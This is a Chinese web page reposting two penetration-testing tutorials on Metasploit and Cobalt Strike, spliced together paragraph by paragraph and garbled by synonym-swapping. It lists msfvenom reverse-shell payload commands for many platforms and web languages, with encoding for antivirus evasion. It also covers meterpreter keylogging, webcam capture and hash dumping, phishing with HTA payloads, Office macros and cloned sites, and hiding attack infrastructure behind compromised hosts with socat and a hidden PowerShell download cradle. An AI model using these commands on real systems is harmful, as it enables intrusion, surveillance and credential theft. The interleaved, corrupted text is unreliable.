xml地图|网站地图|网站标签 [设为首页] [加入收藏]

渗透神器系列,快速上手

来源:http://www.ruibiaowang.com 作者:科技研究 人气:93 发布时间:2019-10-22
摘要:原标题:cobalt strike 急忙上手 [ 一 ] 转自:https://thief.one/2017/08/01/1/?hmsr=toutiao.ioutm_source=toutiao.io 0x01 关于 Cobalt Strike 后天玩了大器晚成把内网渗透,当中第风华正茂接纳了metasploit那款内

原标题:cobalt strike 急忙上手 [ 一 ]

转自:https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

0x01 关于 Cobalt Strike

后天玩了大器晚成把内网渗透,当中第风华正茂接纳了 metasploit 那款内网渗透神器。metasploit我们分明不生分,小编也在很早从前就有接触过,但每一回重复采纳它时都会忘记一些用法,因此为了有支持查询自个儿在本篇记录下metasploit神器的部分常用命令,以致内网渗透中怎样利用它。
Mac下安装metasploit
mac下安装metasploit比较简单,官方网址下载pkg安装包,直接设置就可以;要求专一的是设置到位后的不二法门。msfconsole路线:
1

后生可畏款极度优异的后渗透平台 [ 什么人用何人知道,嘿嘿……说糟糕用的独步天下原因,恐怕便是大多用法尚未被本身打井出来,因为不会用,所以,才会感到倒霉用 ]

/opt/metasploit-framework/bin

工具基于java,大多数效果在创新的底蕴上或许相对相比较实用的,极度符合共青团和少先队间协同应战

该目录下还也有任何多少个常用的工具:

越多详细的情况请自行仿照效法官方网站,这里就不啰嗦了,以下全部简单的称呼'cs'

图片 1

0x02 基础条件简单介绍:

kali 实际调节端 ip:192.168.1.144

msf的插件路线:
1

ubuntu 16.04 自个儿公网的vps ip:53.3.3.6

/opt/metasploit-framework/embedded/framework/modules/exploits

win2010RAV42 目的机器 ip:192.168.1.191

msfvenom
效用:生成木马文件,代替开始时期版本的msfpayload和msfencoder。
Options
msfvenom命令行选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

centos6.9 已控肉鸡 ip:192.168.1.199

-p, --payload <payload> 钦命要求利用的payload(攻击荷载)
-l, --list [module_type] 列出内定模块的享有可用能源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先内定一个NOP滑动长度
-f, --format <format> 钦定输出格式 (使用 --help-formats 来获得msf补助的出口格式列表)
-e, --encoder [encoder] 钦定需求动用的encoder(编码器)
-a, --arch <architecture> 钦命payload的对象架构
--platform <platform> 内定payload的对象平台
-s, --space <length> 设定有效攻击荷载的最大尺寸
-b, --bad-chars <list> 设定规避字符集,比方: 'x00xff'
-i, --iterations <count> 钦赐payload的编码次数
-c, --add-code <path> 钦命一个附加的win32 shellcode文件
-x, --template <path> 钦点二个自定义的可奉行文件作为模板
-k, --keep 爱惜模板程序的动作,注入的payload作为一个新的历程运营
--payload-options 列举payload的正经选项
-o, --out <path> 保存payload
-v, --var-name <name> 内定一个自定义的变量,以分明输出格式
--shellest 最小化生成payload
-h, --help 查看扶植选取
--help-formats 查看msf支持的输出格式列表

win7cn 另后生可畏台肉鸡 ip:192.168.1.123

options usage
翻费用持的payload列表:
1

0x03 先来急速预览cs最基本的有的模块具体用途:

msfvenom -l payloads

集体服务器[teamserver]

翻开销持的输出文件类型:
1

关键是为着便于三个渗透团队内部能够登时分享全数成员的兼具渗透新闻,坚实成员间的交换合营,以此提升渗透功用

msfvenom --help-formats

相当于说,寻常景况下多个集体只须要起三个团队服务器就可以,团队中的负有成员只要求拿着团结的cs顾客端登陆到团体服务器就能够轻便达成同台应战

查阅协理的编码格局:(为了完毕免杀的效用)
1

自然,实际中恐怕为了尽可能久的维系住目的机器权限,还有或然会习贯性的多开多少个团队服务器,幸免现身意外意况

msfvenom -l encoders

其他,团体服务器最佳运营在linux平台上[此番演示所用的团体服务器系统为ubuntu 16.04]

查阅协助的空字段模块:(为了达成免杀的成效)
1

# ./teamserver 团队服务器ip 设置二个团组织服务器密码[旁人要用那些密码才具连步入] 配置文件[貌似暗许就可以] [YYYY-MM-DD]

msfvenom -l nops

# ./teamserver 53.3.3.6 klion

基础payload
命令格式
1

图片 2

msfvenom -p <payload> <payload options> -f <format> -o <path>

客户端[cobaltstrike]

Linux
1
2
3
4

为了更加好的认证效果与利益,此处就分别模拟多个例外的顾客端同不时间登录到同生意盎然台团队服务器中,首先,先在本机运维顾客端尝试登录到团队器,客商端运维未来会提醒您输入团队服务器的ip,端口和密码,顾客名可自由

反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

# ./cobaltstrike

Windows
1

图片 3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

随时,再到另风度翩翩台kali机器上开荒客商端登录登陆到同一共青团和少先队服务器,最终贯彻的法力如下,团队成员能够由此event互相交流,也可因而event清晰看出团队中的另外成员在如何日子都干了些什么,特别详尽直观:

Mac
1
2

# ./cobaltstrike

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

图片 4

PHP
1
2

图片 5

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

运用cs的各类监听器

ASP
1

事实上,监听器的功力相当的粗略,主借使为着承当payload回传的各样数据,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

举个例子,大家的payload在目的机器实行将来,会回连到监听器然后下载施行真正的shellcode代码,其实跟msf中handler的法力为主是一样的

JSP
1

在cs中的监听器有三种,后生可畏种是beacon,另大器晚成种是foreign

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

foreign 重即使提供给外界使用的一些监听器,比方您想选拔cs派生贰个meterpreter的shell回来,来承袭前面的内网渗透,那时就选用选用外界监听器

WAR
1
2

再来轻巧演示下,如何高效创造三个监听器,具体经过如下

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

点击左上角的Cobalt Strike菜单

Python
1

-> 选中Listeners

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

-> 接着点击Add按键会活动跳出监听器的配置框

Bash
1

-> 设置好端口ip [ 实际中最佳用域名(走dns隧道) ]和payload类型就能够创制,之后,团队服务器会一直监听该端口等待beacon shell回连的数目

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

图片 6

Perl
1

图片 7

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

图片 8

Linux Based Shellcode
1

讲完监听器,最终,我们再来讲payload [攻击载荷]

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

说白点儿其实正是个木马下载器,当目的触发payload今后,会自动去下载shellcode[骨子里正是beacon shell的代码]到对象种类中运作,最终成功弹回指标体系的beacon shell,

Windows Based Shellcode
1

有关在beacon shell推行的一声令下都是比照布置职责来的,也正是说被控端会按优先显著好的时间自动去调整端下载各个指令职分逐意气风发在对象系列中施行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

第生机勃勃,大家先来归纳创设个payload,然后径直把它丢到指标连串中执行,看看实际的上线效果到底是个什么体统,注意,这里带红爪子的是早就获得系统最高权力的,没爪子的基本都以系统权限暂且还十分低的

Mac Based Shellcode
1
2

图片 9

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

图片 10

payload加编码
指令格式:
1

图片 11

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

图片 12

常用编码:
1
2

0x04 丰硕的顾客端攻击选项

x86/shikata_ga_nai
cmd/powershell_base64

第生机勃勃,尝试使用 ‘System Profiler’ 模块,搜求指标的每一种机具音讯,比方,指标用的哪些版本的操作系统,什么浏览器,详细版本是不怎么,有未有装flash,flash具体版本又是稍微[低版本能够挂马],看能否来看目的内网ip段,差不离目测推测下指标内网有多大,有了那个基础音信之后,前期我们就足以针对的来信发信,依然那句话,实际中最棒用域名,因为此处是实验所以才间接用的ip,发信时最棒用html伪装个比较”到位”的链接,关于写信发信又是另一个相比较’专门的学问’的能力点,个人技术有限,这里暂不涉及,嘿嘿……上面就给我们简单的看下实际的效果与利益

例子:
1

图片 13

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

图片 14

自行选购模块
变动试行总结器payload例子:
1

图片 15

msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

动用’hta payload’合作’文件下载’模块向指标发送种种钓鱼链接,首先,创制二个hta的payload,这里的payload权且只援助三种可试行格式,exe,powershell和vba(宏),实际中更推荐用powershell,成功率相对较高,好处就非常少说了,免杀,灵活…

payload的坑
常规意况下,利用msfvenom生成的木马文件,可径直上传到对象服务器上运转(加权限)。但本人本身遭受过一个坑,生成的文件内容有风度翩翩部分是没用的,会挑起报错,如下图所示。

图片 16

图片 17

图片 18

图片 19

图片 20

图片 21

斩草除根方案是vim文件,删除文件开首两可以照旧不可以的内容。
msfconsole
作用:用来在指令行下运行metasploit。

图片 22

图片 23

图片 24

运营后可看出metasploit当前版本,以至种种模块的插件数量。
auxiliary扫描模块
exploits漏洞使用模块
payloads
encoders编码模块
nops空字符模块

图片 25

search寻觅模块
比方寻觅ms15_034错误疏失的行使插件
1

生成基于每一种语言的shellcode,如,c,c#,java,python,powershell,ruby,raw,另外,cs也提供了可一向协作veil一起行使的选项,这里依旧以最实用的powershell为例,生成好现在,想办法把脚本载入到目的体系中,这里就一直在对象cmd中载入了,实际中您能够把那么些代码单独扣出来放到任何能进行ps的地点

search ms15_034

# powershell –exec bypass –Command "& {Import-Module 'C:payload.ps1'}"

图片 26

图片 27

图片 28

图片 29

合营木马弹Shell
眼下作者介绍了怎么样行使msfvenom生成木Marvin件,这里作者介绍怎样选拔msf连接上被试行的木马文件,到达调节目的服务器。
常用payload
首先我们回想一下生成木马文件的通令,此中有贰个payload的选项,常用的多少个payload。linux相关payload:
1
2
3
4
5
6

尝试使用office宏钓鱼,并不推荐直接那样搞,因为office暗许是不启用宏的,不过,能够品味合作使用一些业已爆出来的相对相比较新office 0day来搞,注意平时本人用office必须求禁止使用无数字签证的宏,切莫相信vba

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

图片 30

windows相关payload:
1
2
3
4
5
6
7
8

图片 31

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

图片 32

在意:含有x陆十只适用对象服务器为61位操作系统的,未有x64大概应用x86的只适用33位操作系统;含有meterpreter的模块会反弹meterpreter_shell,而平时的shell模块只会反弹普通的shell(反弹结果跟nc类似);reverse_tcp表示木马会主动连接指标服务器,bind_tcp代表木马会监听本地的端口,等待攻击者连接。因此生成的木Marvin件,要借助具体景况而定。
payload选择
前方介绍了常用的payload,那么payload采纳的三大体素如下:
木马连接的势头
指标操作系统及版本
反弹的shell类型

图片 33

木马连接方向:msf木马分为正向连接与反向连接,正向连接相符攻击机能给连接指标机的情形,反向连接使用对象效果连接攻击机的状态,这里所说的接连常常是指tcp的某部端口。由此在生成木马前,需求先判定当前条件,切合正向连接木马如故反向连接的木马。(能够利用nc工具测验,详细仿效:【渗透神器种类】nc)
对象操作系统类型查看:那个背着了!操作系统位数查看:
1

图片 34

getconf LONG_BIT

图片 35

反弹shell类型:这些首要在于反弹的shell的用途,平时推行系统命令的话普通操作系统的shell就够了。假如想要使用高端功效,譬如:键盘记录,开启录像头,增添路由等作用,能够利用meterpreter_shell。
总是木马
开启msf,启用exploit/multi/handler模块。
1
2
3
4
5
6

品尝向健康的exe中放到payload,可是,捆绑完事后的exeLogo可能会被改造,你可以品味把原本的putty.exe的Logo给扣出来,然后再交替下,好好管理下免杀,之后难点主旨就不太大了,从下图能够清晰地观察,当平常的程序推行完将来,我们的payload也如日中天并被施行了[实则payload是先进行的]

use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set RHOST 10.0.0.1
set LPORT 12345
exploit

图片 36

图片 37

图片 38

图片 39

图片 40

留意:这里set的payload跟生成木马使用的payload要平等,其他的参数依照采取的payload而填充。
meterpreter shell
当我们获得对象服务器的meterpreter_shell后,可以开展过多操作。
1
2
3

图片 41

backgroud 将msf进度放到后台
session -i 1 将经过拖回前台运转
run vnc 远程桌面包车型大巴开启

转变守旧的usb自运转payload,你需求提供叁个payload[其生意盎然能够向来用cs生成,不过不免杀,最好依然用你协和解和管理理好的马来搞]就可以,官方说,对xp早先的种类最佳使,win7以往的体系大旨废掉了,实用性并十分的小,所以这里也就不详细说了

文本管理功能:
1
2
3
4
5
6
7
8

图片 42

Download 下载文件
Edit 编辑
cat 查看
mkdir 创建
mv 移动
rm 删除
upload 上传
rmdir 删除文件夹

有关生成常规的exe payload就很简短了,内定下要挂到哪个监听器上,然后给个命中率比较高的名字保存一下,把调换的可推行文件想办法丢到对象机器上试行下,很简单,这里就相当少啰嗦了

互连网及系统操作:
1
2
3
4
5
6
7
8
9
10
11

图片 43

Arp 看ARP缓冲表
Ifconfig IP地址网卡
Getproxy 获替代理
Netstat 查看端口链接
Kill 停止进度
Ps 查看进度
Reboot 重启Computer
Reg 修改注册表
Shell 获取shell
Shutdown 关闭Computer
sysinfo 获取Computer新闻

克隆目的网址针对挂马,提供一个你想克隆的网址,然后配好温馨的url[效仿的玩命跟目的的像一些],然后带上你要举办的payload,这里的payload能够一贯用msf生成,也得以像自身如此用hta,当然啦,实际中那几个payload明确是周全管理过的,机遇谈何轻松,断定不会瞎搞,如故那句话实际写信最棒用html方便把那几个url给管理的更逼真

客商操作和其他功效解说:
1
2
3
4
5
6
7
8
9
10
11

图片 44

enumdesktops 顾客登陆数
keyscan_dump   键盘记录-下载
keyscan_start  键盘记录 - 起头
keyscan_stop   键盘记录 - 结束
Uictl      获取键盘鼠标调节权
record_mic    音频摄像
webcam_chat   查看录制头接口
webcam_list   查看摄像头列表
webcam_stream  录制头摄像获取
Getsystem    获取高权力
Hashdump    下载HASH

图片 45

meterpreter增添路由
多数时候我们收获到的meterpreter shell处于内网,而小编辈必要代理到对象内网情况中,扫描其内网服务器。那时能够选取route功效,加多一条通往指标服务器内网的路由。
翻看shell网络情形:
1

图片 46

meterpreter>run get_local_subnets

图片 47

增添一条通往指标服务器内网的路由
1

‘PowerShell Web Delivery’或然也是豪门常常用的最多的功用模块了,其实,它就约等于msf中的web_delivery模块,会生成意气风发段shellcode代码,然后会提要求你一个下载器,那样你就足以把那几个下载器插到此外能运作powershell且能不奇怪上网的地方,比方,标准的 chm,飞速形式……,因为只是尝试,笔者就直接丢到对象类其余cmd中施行了

meterpreter>run autoroute -s 100.0.0.0/8 (根据指标内网网络而定)

图片 48

查看路由设置:
1

图片 49

meterpreter>run autoroute –p

图片 50

日常的话,在meterpreter中安装路由便能够达到规定的规范通往其内网的目标。然则稍微时候依旧会停业,这时大家得以background重回msf>,查看下外侧的路由情形。
1

图片 51

route print

发垃圾邮件,先把具备的指标邮箱放到多个文书中[注意,每行对应一个],然后再去找个备选择来钓鱼的邮件[直白查看原作,把html整个粘出来],写完信将来记得先预览下,看看实际效果,然后再配备好用来发送邮件的集体邮件服务器,这里本来想用protonmail邮箱服务器来发的,后来看来官方说因为加密的案由暂不协理常规的IMAP,POP3,SMTP,无助,这里就先不演示了,很简单,实际不通晓也足以私信作者……,别的,实际中山高校家最棒用手中已部分各类无名氏邮箱来发[左右只要不外泄私人音信会轻易被人追踪到的邮箱都得以],那很关键……切记,图貌似给贴错了,汗……大家懂小编意思就行

假定发现没有路由音信,表达meterpreter shell设置的路由并未奏效,大家能够在msf中增添路由。
1

图片 52

msf>route add 10.0.0.0 255.0.0.0 1

图片 53

表明:1意味着session 1,攻击机要是要去做客10.0.0.0/8网段的财富,其下日新月异跳是session1,至于什么是下一条这里非常的少说了,反正就是时下攻击机能够访谈内网资源了。
meterpreter端口转发
假定近期大家扫描到了10网段的某些ip存在mysql弱口令,账号密码皆有了,那么大家得以在肉鸡服务器上登录目的服务器mysql。当然,尽管自身想在攻击机上去登入mysql,能够行使端口转载。(某个景况下,内网的机器也无法相互ssh,须要登入沟壍机)
在meterpreter shell中输入:
1

常规java攻击,有版本限制,况兼要买证书,实际渗透中,其实前面这么些骨干就曾经够用了,所以那边就不重大说了

meterpreter > portfwd add -l 55555 -r 10.0.0.1 -p 3306

0x05 通过下边这么些办法,相信此时的您早已搞到了一个beacon的shell,上边大家就来详细表达有关beacon shell自个儿的中央接收[后渗漏阶段],先假使大家获得的是三个还还未有bypass掉uac以前的’管理员’权限的beacon shell,以此来张开持续的风流倜傥部分基本操作,需求事先说惠氏下cs对汉语的支撑并倒霉,假使目的是中国语言历史学系统,有乱码是必定的

代表将10.0.0.1服务器上的3306端口转载到地点的55555端口,然后大家得以在本土运维mysql –h 127.0.0.1 –u root –P 55555 –p 去登录mysql。别的端口如ssh、ftp等都左近,这么些历程跟msf代理很像。
互连网上有关metasploit用法的资料非常多,这里关键记录一些常用用法,以至个体采取进度中的一些坑
参照他事他说加以考察文章:http://www.freebuf.com/sectool/72135.htmlhttp://blog.csdn.net/lzhd24/article/details/50664342http://blog.csdn.net/qq_34457594/article/details/52756458http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html
传送门
【渗透神器类别】DNS消息查询【渗透神器体系】nc【渗透神器连串】nmap【渗透神器种类】Fiddler【渗透神器体系】搜索引擎【渗透神器体系】WireShark

help 查看beacon shell全体内置命令补助,假若想查看内定命令的用法,能够这样,eg: help checkin

note 给当前目录机器起个名字, eg: note beacon-shell

cd在对象种类中切换目录,注目的在于win系统中切换目录要用双反斜杠,恐怕直接用'/' eg: cd c:

mkdir 新建目录, eg: mkdir d:beacon

rm 删除文件或目录, eg: rm d:beacon

upload 上传文件到对象连串中

download从指标类别下载钦定文件,eg: download C:Userswin7cnDesktopputty.exe

cancel撤消下载职分,比如,三个文件假若特意大,下载也许会极其耗时,假设中途你不想继承下了,就能够用这些裁撤一下

shell在对象种类中实行钦赐的cmd命令, eg: shell whoami

getuid 查看当前beacon 会话在对象类别中的客商权限,只怕供给bypassuac可能提权

pwd查看当前在目录系统中的路线

ls列出当前目录下的兼具文件和目录

drives列表出目的体系的保有分区[win中叫盘符]

ps查看指标种类当下的具备的历程列表

kill杀掉钦命进度, eg: kill 4653

sleep 10点名被控端休眠时间,默许60秒二次回传,让被控端每10秒来下载二回任务,实际中频率不宜过快,轻便被察觉,80左右三次就可以

jobs列出全数的任务列表,某个职分执行时间也许某些较长,此时就可以从职分列表中见到其所对应的具体职分id,针对性的排除

jobkill假如开采义务不知是何原因长日子尚无实行大概极度,可尝试用此命令直接结束该职责, eg: jobkill 1345

clear清除beacon内部的职责队列

checkin强制让被控端回连叁次

exit 终止当前beacon 会话

ctrl + k 清屏

0x06 搜求目的机器上的每一种消息[稍加只怕会触发敏感api导致防护报告急察方,另外进度注入,被控端大概觉获得非常分明的卡顿,工具也许有多数不全面包车型大巴地点]:

在指标类别中放置常规键盘记录, eg: keylogger 1796 x86

图片 54

尝试在目的连串中截屏,恐怕会促成指标种类有很鲜明的卡顿,eg: screenshot 1796 x86 10 截取10秒

图片 55

选拔web代理,威胁转载目的浏览器进度数据到钦定的端口上,然后大家再从该端口访问,就一定于拿着对象的浏览器中的数据访问

举例,我们透过截屏发现他登陆有些需求账号密码的站点,通过浏览器代理小编就能够达成无密码直接登陆他所登入的极其站点,作者表达技艺倒霉,相信大家应该都懂小编意思

合法说一时只对IE好使,並且还不安宁,成功率50%二分一吧,估算是dump进程数据的由来,dump须臾间或者会促成目的浏览器巨卡

然则不得不说这几个主张照旧要命好的,只是作用方今做的 [ 这里膜拜下我,大写的赞] ,还不是特地完善,山穷水尽的情况下得以品味下

browserpivot 1460 x86

browserpivot stop

图片 56

图片 57

图片 58

图片 59

域内渗透相关模块,其实,假使真是域内渗透,我们得以一时不用那样搞,后续再独自说

kerberos_ccache_use 从ccache文件中程导弹入票据

kerberos_ticket_purge 清除当前shell的协议

kerberos_ticket_use 从ticket文件中程导弹入票据

0x07 通过种种powershell渗透框架来进步cs的实用性,如,nishang,empire,PowerSploit,powerup,Sherlock……续的,提权,bypassuac,dll注入,抓hash,pth……都以大同小异的用法,大旨依旧在这里个脚本上,关于各类powershell框架的求实用法,请关心博客相关文章,这里就比极小器晚成风度翩翩演示了,就回顾说一下用法,当然,beacon shell本人也提供了靠近的作用,只是本人未曾说,但实则中那么些大概还相当不足,並且它自个儿的工具职业的亦不是格外好,所以更推荐我们尤其是在win内网渗透中,尽也许全体用powershell来搞

先是种方法,在beacon shell中程导弹入外界ps脚本到长途机器上

powershell-import /root/Desktop/Get-Information.ps1

powershell Get-Information

图片 60

其次种方法,在beacon shell中央直属机关接试行powershell代码

powerpick Get-Host

图片 61

0x08 利用cs灵活穿透指标内网

对目的机器所在的内网进行常规端口扫描,内定ip段,钦命用于扫描的磋商[暂只扶持arp,icmp,tcp],钦命线程[切记实际中毫无开的太高]

portscan 192.168.1.0/24 1-6000 arp 10

图片 62

becon shell内置的端口转载功效,把本机的有个别端口转到公网只怕内网钦赐机器的某部端口上,实际用的时候速度确实比极慢,並且平常断……原因暂未知

rportfwd 389 192.168.1.181 3389

rportfwd stop 389

图片 63

图片 64

让cs和msf相互间联合浮动接收,在对象机器上开启socks4a代理,方便进一步的内网渗透

首先种,利用各个socks代理顾客端直接把各种渗漏工具带进目的内网

beacon> socks 1234

图片 65

# vi /etc/proxychains.conf

socks4 53.3.3.6 1234

# socks stop

图片 66

第二种,直接接纳隧道直接把全部msf带进指标内网

setg Proxies socks4:53.3.3.6:1234

图片 67

图片 68

采取beacon shell连接内网中的linux机器

ssh 192.168.1.199:22 root admin

图片 69

透过beacon隧道直接派生二个meterpreter的shell[非vps上做转账,直接通过beacon隧道过来],流程很简短,首先,在团队服务器上做端口转载,然后创造三个外部监听器,端口和ip写beacon shell的机器所在的ip,然后在对应的beacon shell中’spawn’选中刚刚创设好的外界监听器,临时还应该有个别难题并未有很好的消除,前面单独说

至于怎么利用msf弹回三个beacon shell的格局就那一个了,最简便易行的方法正是直接推行下beacon的payload的代码就足以了,又忘贴图了,汗……早先时期再补上来吧

0x09 协作常规端口转发尽可能遮盖本身的团体服务器

不常为了张冠李戴,制止被人家快速溯源到,也许会在中游加一些跳板来尽量掩饰大家足履实地的团组织服务器地点,如何做啊,其实非常粗大略

说白点正是做端口转发[又名重定向],当然啦,这些端口转载确定是在友好原来就有的肉鸡上做[论佚名的第如日方升]

假定您实在不放心,也得以品味同不平时间在多少个肉鸡上,做多种转载[也便是多加几层跳板],以此来吸引对方,加大对手的根源难度,那是那个

还有些指标内网中的某个机器是迫石钟山常直连公网的,只好内网机器间相互走访,但大家照旧想让那台不可能上网的机械也能健康上线

那就要动用咱们立即要说的端口转载,至于具体用什么工具自然就可怜多了,不过,依然引入我们首荐一些体系自带工具来搞,比如,netsh,iptables,socat之流……

这样,你好,我也好 ^_^

上边就用socat来回顾演示下什么样尽量遮蔽自身的团体服务器,关于内网断网机器上线也是大同小异的道理,大家可活动尝试

第生龙活虎,到kali中用cs顾客端登到大家的团组织服务器,成立二个符合规律80端口的监听器,这里的回连ip暂且直接用vps所在的真人真事ip[实际上中尽量用域名,很珍视],如下

图片 70

图片 71

进而,就能够ssh到肉鸡上用socat早先做转账了,上面那句话的情致就是以后自外界的80端口上的流量转到公网vps的80端口上,之后肉鸡本地的80端口会直接处于监听状态,只要80端口生意盎然有流量经过就能自动转变到vps的80端口,而vps的80端口又刚刚是我们的监听器端口,那意思,相信你懂的

# socat tcp-listen:80,reuseaddr,fork tcp:53.3.3.6:80 &

图片 72

那会儿,回到cs客商端随意创制三个powershell payload,注意,正如大家日前所说,那只是个powershell下载器,首要担当下载真正的shellcode代码,必供给记得把前边的ip要改成肉鸡的ip[因为自己这边是模仿的肉鸡,所以才是个内网ip,实际中自然是个公网ip恐怕域名],因为大家最后的目的是经过肉鸡帮大家转载到我们的确的团队服务器上去,以此来实现尽量遮盖的指标

瞩目这里,暗许生成今后,它是大家温馨团队服务器分析的不胜域名,实际中必然要手动把它改成肉鸡的域名或ip,这样,当下载访谈一定会将首先会访谈到肉鸡,而大家早就在肉鸡做了转接,所以最后还是会高达我们的团队服务器成功下载到shellcode代码,小编个污染源,竟然连码都没打全,算了,反正vps立刻也快到期了,打游击打习贯了,嘿嘿……^_^

# powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

图片 73

图片 74

图片 75

图片 76

末段,大家看出目的平常上线,至于,怎么让对象内网中无法健康连网的机器也能常常上线都是一模二样的道理,你能够把payload回连的流量弹到内网中别的生机勃勃台可以平常上网的机械上,然后再去那台机械上把弹过来的流量转到大家公司服务器上,那样就可以直达让内网中不能够上网的机械也如出风流洒脱辙健康上线

0x10 深远领悟dns隧道通讯以至smb beacon通信进度,那大概是成套工具最基本的地点之风姿浪漫,后续会用大批量的字数单独说

0x11 至于牛逼的告诉生成功能这里就隐蔽了吗,帮衬后生可畏键导出pdf,实际渗透进程中的全数操作记录数据总体都被保留在钦定的目录中,我们风乐趣可自行钻研,比较轻巧,毕竟不是大家这里的最首要,就相当的少啰嗦了

一些计算:

大家也看见了,关于工具自身使用非常轻便,纯图形化操作,稍微有些基础,比较快就会上手,何况它一向援助Logo灵活拖拽,很便利对点名肉鸡进行汇总批量操作,非一般温度馨,实际准将msf和cs同盟起来进行内网渗透,无疑权且也是极好的,真正的难处还在于对区别协商的beacon shell通讯进程的明亮,那也是私家感到全体工具最值钱的地点,讲真的,关于其内部的通讯细节非常多主题材料由来仍干扰着自己,一向都以为cs本人便是神采飞扬款非常健全的就学样品,里面有太多值得深挖沉淀的事物,只是苦于有广大事物,并不是一人所能完毕,相信也大家跟自家同黄金时代,绝不会仅仅满足于工具基本使用上,其实心里都很精晓,那样基本是不会有哪些实质性的进化的,时间非常少,容不得浪费,所以也丰盛愿意跟我们意气风发块儿深刻交流……对了,cs 3.8也已经出来了生意盎然段时间了,想尝鲜的相爱的人可以去探究,延长试用期照旧老办法…

文章出处:klion's blog

原稿链接:)

责编:

本文由澳门新葡萄京娱乐网站发布于科技研究,转载请注明出处:渗透神器系列,快速上手

关键词:

最火资讯